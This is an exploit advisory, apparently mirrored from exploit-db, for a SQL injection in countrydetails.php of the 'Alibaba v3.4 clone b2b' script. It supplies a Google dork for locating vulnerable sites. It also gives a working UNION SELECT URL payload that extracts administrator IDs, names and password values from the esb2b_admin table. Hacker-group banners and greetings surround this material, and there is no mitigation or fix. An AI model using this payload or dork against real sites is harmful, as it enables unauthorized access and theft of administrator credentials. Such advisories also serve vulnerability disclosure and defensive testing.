Alibaba Clone B2B 3.4 – SQL Injection

  • 作者: Dr.0rYX & Cr3W-DZ
    日期: 2010-12-01
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15650/
  • Exploit Title:Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability 
Date: 29.11.2010
Author: Dr.0rYX and Cr3w-DZ
Category: webapps/0day
***************************************************************************************************
* _______ ___________.__ ___________.__*
*____ \ _\______\_____/||__ _____\_ _____/______|__| ____ _____*
* /\//_\\___ \|| ||\ ______ \__\|__) \___ \|/ ___\\__\ *
*| |\\_/ \| \/|| | Y\ /_____// __ \_| \ || \/\\___ / __ \_ *
*|___|/\_____/__| |____| |___|/ (____/\___/ |__||__|\___>____/ *
* \/ \/ \/ \/ \/\/ \/*
*.____ __*
*______ ____ ______ _________|__|/|_ ___.__. _/|_____ __________ *
* /___// __ \_/ ___\||\___ \\ __< || \ __\/ __ \\__\/ \*
* \___ \\___/\\___||/|| \/|||\___||| \___/ / __ \|Y Y\ *
*/____>\___>\___>____/ |__||__||__|/ ____||__|\___>____/__|_|/ *
* \/ \/ \/ \/ \/ \/\/*
*Pr!v8 Expl0iT AND t00l ** *
*ALGERIAN HACKERS*
*********************************- NORTH-AFRICA SECURITY TEAM -*************************************
[!] Alibaba v3.4 clone b2b(countrydetails.php) SQL Injection Vulnerability 
[!] Author: Dr.0rYX and Cr3w-DZ
[!] MAIL: sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>&Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
 
***************************************************************************/
[!] notice :
 Dr.0rYX:MY OLD EMAIL VX3@HOTMAIL.DECLOSED
 MY NEW EMAIL ISSNIPER-DZ@HOTMAIL.DE

***************************************************************************/

[ Software Information ]
 
[+] Vendor : http://www.alibabaclone.com/
[+] script : Alibaba v3.4 clone b2b 
[+] Download : http://www.alibabaclone.com/ (sell script )
[+] Vulnerability : SQL injection
[+] Dork : inurl:"countrydetails.php?es_id="

**************************************************************************/

[ Vulnerable File ]

http://server/countrydetails.php?es_id=sql[N.A.S.T ]

[ Exploit ]

http://server/countrydetails.php?es_id=-1+UNION+ALL+select+1,Group_concat(CONVERT(es_id USING utf8),0x3a,CONVERT(es_admin_name USING utf8),0x3a,CONVERT(es_pwd USING utf8)),3,4+from+esb2b_admin--

[GReet ]

[+] : evilzone.org , exploit-db.com ,Inj3ct0r 1337 Exploit DataBase 1337db.com , ALL HACKERS MUSLIMS